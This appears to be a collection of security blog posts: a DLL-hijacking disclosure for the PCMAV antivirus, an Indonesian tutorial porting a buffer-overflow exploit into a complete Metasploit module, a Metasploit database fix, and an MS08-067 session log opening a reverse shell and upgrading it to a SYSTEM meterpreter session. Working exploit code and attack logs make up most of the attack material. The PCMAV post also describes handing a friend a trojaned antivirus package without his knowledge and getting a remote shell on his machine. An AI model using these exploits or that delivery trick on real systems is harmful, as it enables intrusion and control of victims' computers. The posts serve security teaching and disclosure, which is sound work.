PC Media Antivirus Insecure Library Loading Vulnerability

PC Media Antivirus (PCMAV) is an antivirus made by famous Indonesia computer magazine PCMedia . PCMAV is quite popular in 2006 since many virus creators in Indonesia actively spread a computer virus and infecting most computers in Indonesia. At that time some people start to claim a special anti-virus to detect Indonesia computer viruses, some of which are popular such as SmadAV, PC Media Antivirus (PCMAV), and AnsAV (edit: can’t find any official links).

Until now, PCMAV is still a popular antivirus used on most computers in Indonesia. PCMAV usually installed alongside with another popular free antivirus such as Avast, AVG, or Avira Antivir. In some companies, PCMAV is also a mainstay for detecting viruses made in Indonesia.

Antivirus is an endpoint protection to detect malicious programs from outside the computer, so the antivirus should be made with good protection, well flow design, and it should not vulnerable, thus cannot be exploited.

Proof of concept in antivirus product has been researched since a few years ago. Some well-known antivirus cannot survive and suffer from exploitation, thus bringing the risk to computer users.

This time, Spentera brought PCMAV antivirus to our garage to be tested. As a result, PCMAV suffers Insecure Library Loading vulnerability, also known as DLL Hijacking. The vulnerability works as a common DLL Hijacking technique, that an attacker can “introduce” his/her own DLL to be loaded by the vulnerable software. But in this case, it becomes more interesting. Since PCMAV made as portable, users can install PCMAV without installation, it is of course to make it easier to the users.

With the DLL Hijacking vulnerability in PCMAV, it becomes more dangerous. Since the attacker can “introduce” his/her .dll, PCMAV will automatically load the dll without confirmation. So hey, what is the problem?! I can’t get it. Well, let say you create your own DLL to execute another backdoor, listening on port with a command prompt serve you later. Very dangerous isn’t it?!

To be more clear, let us see how the action of this DLL Hijacking on PCMAV.

We can download the latest PCMAV from their website (at the time of writing, this link works and that was the current version): http://virusindonesia.com/2012/11/23/pc-media-112012-pcmav-8-4-raptor/. Now, if we analyzed using Process Monitor, PCMAV load several DLLs, but there is one interesting here.

The svrapi.dll is introduced by PCMAV itself. The svrapi.dll is a common Microsoft Common Server API Library, it is a system process that is needed to work properly. Because it is introduced by PCMAV, we can also introduce our (malicious) svrapi.dll.

Metasploit has the capability to generate malicious DLL, here is the way to create a DLL that can spawn a reverse shell to our machine.

Once created, we just simply put this malicious svrapi.dll into PCMAV’s root directory, the same path as the executable (PCMAV.EXE). Since our prep is complete, now we setup our meterpreter listener in our machine.

Our friend, Tom was asking a good antivirus to detect Ramnit. We put Tom on the test, we give him our modified PCMAV, with our DLL introduced in the root directory. When the package has been delivered to our good friend, Tom, he should be happy because he will get his computer cleaned with PCMAV antivirus. But unfortunately we change the story, Tom executed the PCMAV.EXE, and soon our svrapi.dll get loaded, and not so long, our meterpreter handler receives a connection.

We got our shell and Tom is happy because PCMAV is still scanning his system properly.

Moral of the story: DO NOT trust any files comes from external removable media, even from your trusted friend. Download it from original source (if any).

Note: Tom still doesn’t know about this.. psst..

Porting Your Exploit to Metasploit

Beberapa waktu yang lalu saya udah memberikan tutorial basic exploit development (direct return technique) dan exploit development berbasis SEH. Sekarang mari kita porting exploit tersebut ke Metasploit Framework agar exploit tersebut semakin reliable dan bisa menggunakan macam-macam payload, fitur-fitur canggih yang ada di Metasploit.

Kita akan meng-konversi exploit yang pertama, yaitu Free CD to MP3 Converter. Sebelum itu, kita kumpulkan poin-poin penting yang membuat exploit tersebut berjalan dengan baik, seperti berikut:

junk = "\x41" * 4112                   # jumlah sampah yang dikirim
eip = "\x91\x3b\x43\x00"               # 0x00463b91 FFE4 JMP ESP at cdextract.exe
nops = "\x90" * 16
espdata = "\x90" * (5000 - len(junk+eip+nops)

Dulu saya melakukan proses exploit Free CD to MP3 Converter pada sistem Windows XP SP3 versi NIST FDCC (Federal Desktop Core Configuration), tapi kali ini saya melakukannya pada sistem Windows XP SP3 versi umum, seharusnya ini tidak akan menjadi masalah berarti karena alamat JMP ESP yang saya gunakan kali ini berasal dari module cdextract.exe.

Kita akan coba langsung meng-konversi exploit Free CD to MP3 Converter ke format Metasploit, dan akan saya jelaskan bagian-bagian yang penting. Karena proses eksploitasi Free CD to MP3 Converter menggunakan sebuah file wav (sehingga dikategorikan sebagai file format exploit), maka kita akan menggunakan salah satu exploit dari Metasploit sebagai template, yaitu a-pdf_wav_to_mp3.rb terdapat pada direktori /opt/framework/msf3/modules/exploits/windows/fileformat/

##
# $Id: a-pdf_wav_to_mp3.rb 12196 2011-04-01 00:51:33Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3  'A-PDF WAV to MP3 v1.0.0 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When
        the application is used to import a specially crafted m3u file, a buffer overflow occurs
        allowing arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'd4rk-h4ck3r', # Original Exploit
          'Dr_IDE',      # SEH Exploit
          'dookie'       # MSF Module
        ],
      'Version'        => '$Revision: 12196 $',
      'References'     =>
        [
          [ 'OSVDB', '67241' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/14676/' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/14681/' ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'seh',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x0a",
          'StackAdjustment' => -3500
        },
       'Platform' => 'win',
       'Targets'        =>
            [
              [ 'Windows Universal', { 'Ret' => 0x0047265c, 'Offset' => 4132 } ],     # p/p/r in wavtomp3.exe
            ],
       'Privileged'     => false,
       'DisclosureDate' => 'Aug 17 2010',
       'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ], self.class)

  end

  def exploit

    sploit = rand_text_alpha_upper(target['Offset'])
    sploit << generate_seh_payload(target.ret)

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(sploit)

  end

end

Bagian yang perlu diperhatikan adalah:

  • include Msf::Exploit::FILEFORMAT

    bagian ini menandakan bahwa exploit ini termasuk dalam fileformat exploit.

  • Payload

    bagian ini berisi space, badchars, dll

  • Targets

    bagian ini berisi offset

  • def exploit

    bagian ini berisi urutan eksploitasi.

Mari kita gabungkan informasi yang kita miliki diawal kedalam contoh exploit yang sudah ada.

##

##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3  'Free CD to MP3 Converter 3.1 Buffer Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow in Free CD to MP3 Converter 3.1. When
        the application is used to import a specially crafted m3u file, a buffer overflow occurs
        allowing arbitrary code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'C4SS!0 G0M3S', # Original Exploit
          'modpr0be'       # MSF Module
        ],
      'References'     =>
        [
          [ 'OSVDB', '69116' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/15480/' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => 'true',
        },
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x0a\x1a\x0f",
          'StackAdjustment' => -3500
        },
       'Platform' => 'win',
       'Targets'        =>
            [
              [ 'Windows XP Universal', {
                    'Ret' => 0x00463B91,     # perintah JMP ESP yang akan menimpa EIP.
                    'Offset' => 4112 } ],    # jmp esp in cdextract.exe, jumlah offset yang dicapai untuk menimpa EIP
            ],
       'Privileged'     => false,
       'DisclosureDate' => 'Nov 10 2010',
       'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
      ], self.class)

  end

  def exploit

    sploit = rand_text_alpha(target['Offset'])
    sploit << [target.ret].pack('V')
    sploit << make_nops(32)
    sploit << payload.encoded
    sploit < 0x00463B91

adalah perintah JMP ESP yang akan menimpa EIP.

Offset => 4112

adalah jumlah offset yang dicapai untuk menimpa EIP 🙂

Lalu bagian paling penting dari script tersebut, yaitu def exploit;

rand_text_alpha(target['Offset']

bagian ini adalah function dari Metasploit untuk men-generate sejumlah karakter alphanumeric sesuai dengan Offset yang telah kita tentukan di option Target sebelumnya. Setelah offset memenuhi stack dengan jumlah 4112 bytes, maka kita juga sudah tahu bahwa setelah itu EIP akan tertimpa sebanyak 4 bytes, sehingga option berikutnya [target.ret].pack(‘V’) memanggil alamat Ret => 0x00463B91 yang telah kita tentukan sebelumnya dan segera menimpa EIP. Setelah itu

make_nops(32)

akan menciptakan Nopsled sebanyak 32 bytes agar menjadi ‘landasan kosong’ sebelum mencapai shellcode. Bagian berikutnya,

payload.encoded

adalah function dari Metasploit untuk men-generate payload yang biasa kita gunakan pada Metasploit (misal: set payload windows/shell_bind_tcp). Terakhir, saya menambahkan Nopsled untuk melengkapi buffer yang saya kirim sebelumnya agar mencapai 5000 bytes (sesuai dengan buffer yang saya kirim sebelumnya). Lalu function

file_create(sploit)

menulis variable sploit dan menciptakan file msf.wav.

Simpan file diatas dengan nama freecdmp3_bof.rb dan copy ke folder /opt/framework/msf3/modules/exploits/windows/fileformat/ agar dapat digunakan oleh Metasploit. Berikut penggunaannya pada msfconsole:

       =[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 738 exploits - 376 auxiliary - 82 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13774 updated yesterday (2011.09.22)

msf > use exploit/windows/fileformat/freecdmp3_bof
msf  exploit(freecdmp3_wav) > info

       Name: Free CD to MP3 Converter 3.1 Buffer Overflow
     Module: exploit/windows/fileformat/freecdmp3_bof
    Version: 0
   Platform: Windows
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  C4SS!0 G0M3S
  modpr0be

Available targets:
  Id  Name
  --  ----
  0   Windows XP Universal

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.wav          no        The file name.

Payload information:
  Space: 800
  Avoid: 4 characters

Description:
  This module exploits a buffer overflow in Free CD to MP3 Converter
  3.1. When the application is used to import a specially crafted wav
  file, a buffer overflow occurs allowing arbitrary code execution.

References:
  http://www.osvdb.org/69116
  http://www.exploit-db.com/exploits/15480/

msf  exploit(freecdmp3_bof) > set payload windows/shell_bind_tcp
payload => windows/shell_bind_tcp
msf  exploit(freecdmp3_bof) > set lport 4321
lport => 4321
msf  exploit(freecdmp3_bof) > exploit 

[*] Creating 'msf.wav' file ...
[*] Generated output file /home/tom/.msf4/data/exploits/msf.wav
msf  exploit(freecdmp3_bof) >

Dan ketika di load oleh program Free CD to MP3 Converter, sekilas program akan terlihat ‘hang’ tapi jika kita lihat melalui netstat:

Terdapat port 4321 yang sedang LISTENING. Dan ketika kita melakukan koneksi ke port tersebut:

Kita berhasil mengkonversi exploit yang sudah ada ke dalam Metasploit. Sekarang coba porting exploit berbasis SEH yang kemarin sudah kita kerjakan sama-sama. Selamat mencoba!

MSF PostgresQL Problem on BT5

If you read this post then I bet you have the same problem with me. When I tried to run the msfconsole on my BT5 I have this buggy information.

[-] Failed to connect to the database:
could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 7175?

Seems that the MSF could not connect to Postgres database server. I tried to install the Postgres server inside my BT5 and still have no luck. So I starting to search over the internet and found the solution for this problem. Here are the solution.

rm /opt/framework3/postgresql/data/postmaster.pid
rm /opt/framework3/postgresql/.s.PGSQL.7175
rm /opt/framework3/postgresql/.s.PGSQL.7175.lock
/etc/init.d/framework-postgres start

Then, try to run the msfconsole again.

NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"
NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"
NOTICE:  CREATE TABLE will create implicit sequence "cred_files_id_seq" for serial column "cred_files.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "cred_files_pkey" for table "cred_files"
NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"
NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"

______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
\                                  /                      /
\     .                          /                      /            x
\                              /                      /
\                            /          +           /
\            +             /                      /
*                        /                      /
/      .               /
X                             /                      /            X
/                     ###
/                     # % #
/                       ###
.       /
.                       /      .            *           .
/
*
+                       *

^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf > quit

It will create the databases structure. Again run the msfconsole once again to make sure that it connect to the database correctly

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%     %%%         %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %  %%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%  %%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%  %%%%%%%%%   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%  %%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%    %%   %%%%%%%%%%%  %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%  %%%%%
%%%%  %%  %%  %      %%      %%    %%%%%      %    %%%%  %%   %%%%%%       %%
%%%%  %%  %%  %  %%% %%%%  %%%%  %%  %%%%  %%%%  %% %%  %% %%% %%  %%%  %%%%%
%%%%  %%%%%%  %%   %%%%%%   %%%%  %%%  %%%%  %%    %%  %%% %%% %%   %%  %%%%%
%%%%%%%%%%%% %%%%     %%%%%    %%  %%   %    %%  %%%%  %%%%   %%%   %%%     %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%  %%%%%%% %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%          %%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

=[ metasploit v4.0.1-dev [core:4.0 api:1.0]
+ -- --=[ 732 exploits - 374 auxiliary - 82 post
+ -- --=[ 227 payloads - 27 encoders - 8 nops
=[ svn r13728 updated today (2011.09.13)

msf >

Nice! Good luck to you.

Metasploit Meterpreter Command Shell Upgrade

Seeing is believing 🙂

root@bt:~# msfconsole

=[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
=[ svn r13065 updated today (2011.06.29)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094

Good, command shell is on the background now, what if we want to change that existing command shell session into meterpreter session? re-exploit? Oops, you should forget about to re-exploit, Metasploit has a feature to upgrade the command shell session to meterpreter session, look at the -u option. Let’s try that.

msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

-K Terminate all sessions
-c Run a command on the session given with -i, or all
-d Detach an interactive session
-h Help banner
-i Interact with the supplied session ID
-k Terminate session
-l List all active sessions
-q Quiet mode
-r Reset the ring buffer for the session given with -i, or all
-s Run a script on the session given with -i, or all
-u Upgrade a win32 shell to a meterpreter session
-v List verbose fields

msf exploit(ms08_067_netapi) > sessions -u 1

[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700

Well, new meterpreter session is now on the session list 😉

msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 shell windows Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32> 192.168.96.1:443 -> 192.168.96.129:1094
2 meterpreter x86/win32 NT AUTHORITYSYSTEM @ XP_FDCC 192.168.96.1:443 -> 192.168.96.129:1095

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter >

nice feature, good job Metasploit team 😉

PHP Include Exploitation with Metasploit

Metasploit support for PHP Include exploitation, or simply known as RFI (Remote File Inclusion). I will show you how this work on CS-Cart 1.3.3 which vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI PATH will be like this:

classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX

let see how this exploitation works.

More